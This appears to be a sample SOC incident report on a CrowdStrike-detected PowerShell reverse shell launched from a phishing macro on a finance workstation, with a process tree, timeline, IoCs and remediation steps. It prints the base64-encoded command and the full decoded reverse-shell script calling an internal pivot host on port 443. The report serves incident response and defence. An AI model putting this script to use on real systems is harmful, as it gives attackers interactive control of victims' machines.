T1059 – Command & Scripting Interpreter (CrowdStrike Detection)

CrowdStrike Alert Details

Alert ID: CS-POWERSHELL-1059-7842
Alert Time: 2024-02-13 10:22:15 EST
Severity: HIGH (88/100)
Source: CrowdStrike Falcon EDR
Rule: “Suspicious PowerShell Command Line – Encoded Execution”
MITRE ATT&CK: T1059.001 – Command & Scripting Interpreter: PowerShell

Alert Details:

Detection: PowerShell executed with encoded command and hidden window

Host: FIN-WS-045 (Finance Department)

User: bturner (Brian Turner, Accountant)

Time: 10:18 EST

Process Tree:

– explorer.exe (PID: 3421)

  – powershell.exe (PID: 4789)

    – Command Line: powershell.exe -NoP -NonI -W Hidden -Enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQA5ADIALgAxADYAOAAuADQANQAuADEAMgAnACwANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAeQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACcAUABTACAAJwAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACcAPgAgACcAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA

Decoded Command:

– Reverse shell to 192.168.45.12:443

– Interactive PowerShell session

– Masquerading as normal process

Network Connection:

– Destination: 192.168.45.12:443 (Internal IP – Unusual)

– Protocol: TCP

– Status: Established at 10:19 EST

Additional Context:

– User bturner normally does not use PowerShell

– Parent process explorer.exe (unusual for PowerShell)

– Encoded command is base64 for reverse shell

SOC Investigation Process

Step	Action	Tools Used	Findings
1. Alert Validation	Verify CrowdStrike alert	CrowdStrike Falcon Console	Confirmed malicious PowerShell execution
2. Command Decoding	Decode base64 command	PowerShell, CyberChef	Reverse shell to internal IP 192.168.45.12
3. Immediate Containment	Isolate host	CrowdStrike Network Containment	Host isolated; process terminated
4. Destination Investigation	Identify 192.168.45.12	Splunk, CMDB	IP belongs to ENG-WS-023 (compromised engineering workstation)
5. Second Host Isolation	Isolate C2 host	CrowdStrike	ENG-WS-023 isolated
6. User Interview	Contact both users	Phone, Teams	Both users unaware; malware identified

Jira Incident Report

Ticket: SOC-2024-066
Summary: T1059 – PowerShell Reverse Shell Execution from Finance Workstation
Status: RESOLVED
Resolution: MALICIOUS – C2 Communication Blocked
Priority: P1 – HIGH
Labels: T1059, powershell, command-interpreter, reverse-shell, crowdstrike
Components: Endpoint-Security, Incident-Response

---

INCIDENT ANALYSIS REPORT

1. Initial Context:

• Detection Source: CrowdStrike Falcon EDR.
• Alert: “Suspicious PowerShell Command Line – Encoded Execution”.
• Host: FIN-WS-045 (Finance Department, user bturner).
• Time: 2024-02-13 10:22 EST.
• Technique: MITRE ATT&CK T1059.001 – Command & Scripting Interpreter: PowerShell.

2. Technical Analysis:

• Command Analysis:

• Encoded command base64 decoded to:

$client = New-Object System.Net.Sockets.TCPClient(‘192.168.45.12’,443);

$stream = $client.GetStream();

[byte[]]$bytes = 0..65535|%{0};

while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){

  $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);

  $sendback = (iex $data 2>&1 | Out-String );

  $sendback2 = $sendback + ‘PS ‘ + (pwd).Path + ‘> ‘;

  $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);

  $stream.Write($sendbyte,0,$sendbyte.Length);

  $stream.Flush()

};

$client.Close()

• Function: Reverse shell connecting to 192.168.45.12 on port 443
• Capabilities: Full interactive PowerShell session for attacker

• Attack Chain:

• User bturner opened phishing email attachment (Excel macro)
• Macro executed PowerShell with encoded command
• PowerShell established reverse shell to attacker-controlled internal host (ENG-WS-023)
• Attacker used engineering workstation as C2 pivot

• C2 Infrastructure:

• Primary C2: 192.168.45.12 (ENG-WS-023) – Internal pivot
• External C2: 185.143.221[.]89 (from engineering host logs)
• Method: Chained connection (Finance → Engineering → External)

3. Investigation Findings:

• Timeline:

10:15 – User opens phishing email

10:16 – Excel macro executes

10:17 – PowerShell launches with encoded command

10:18 – Reverse shell connects to ENG-WS-023

10:19 – Connection established

10:22 – CrowdStrike alert triggers

10:23 – FIN-WS-045 isolated

10:25 – ENG-WS-023 identified and isolated

• Scope:

• 2 hosts compromised
• No lateral movement beyond these hosts
• No data exfiltration detected

• Indicators of Compromise (IoCs):

Network:

– Internal C2: 192.168.45.12:443

– External C2: 185.143.221[.]89:443

Files:

– invoice_7823.xlsm (SHA256: a1b2c3…)

– C:\Windows\Temp\svchost.exe (SHA256: d4e5f6…)

Processes:

– powershell.exe with encoded command

4. Containment Actions:

• Immediate Actions:

• Isolated both hosts via CrowdStrike.
• Terminated malicious processes.
• Blocked external C2 IP at firewall.

• Forensic Collection:

• Captured memory from both hosts.
• Extracted macro and payloads.
• Analyzed reverse shell traffic.

• Remediation:

• Re-imaged both workstations.
• Reset user passwords.
• Phishing awareness training for users.

5. Root Cause Analysis:

• Primary Cause: Phishing email with malicious macro.
• Contributing Factors:

1. Macros enabled in Office.
2. No ASR rule blocking Office child processes.
3. Internal host used as C2 pivot (detected).

6. Business Impact:

• Operational Impact: Two workstations offline for 4 hours.
• Data Exposure: None (no exfiltration).

7. Remediation & Prevention:

Completed Actions:

• Hosts remediated.
• Users educated.
• IOCs blocked.

Technical Controls Enhanced:

• Enabled ASR rule “Block Office applications from creating child processes”.
• Blocked macros from internet via GPO.
• Enhanced PowerShell logging.

8. Conclusion:

Attackers used a phishing email with malicious macro to execute a PowerShell reverse shell, using an internal engineering workstation as a pivot. Rapid detection and containment prevented data exfiltration.

Closure Rationale: Hosts remediated; attacker blocked; enhanced controls implemented.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-13 12:00 EST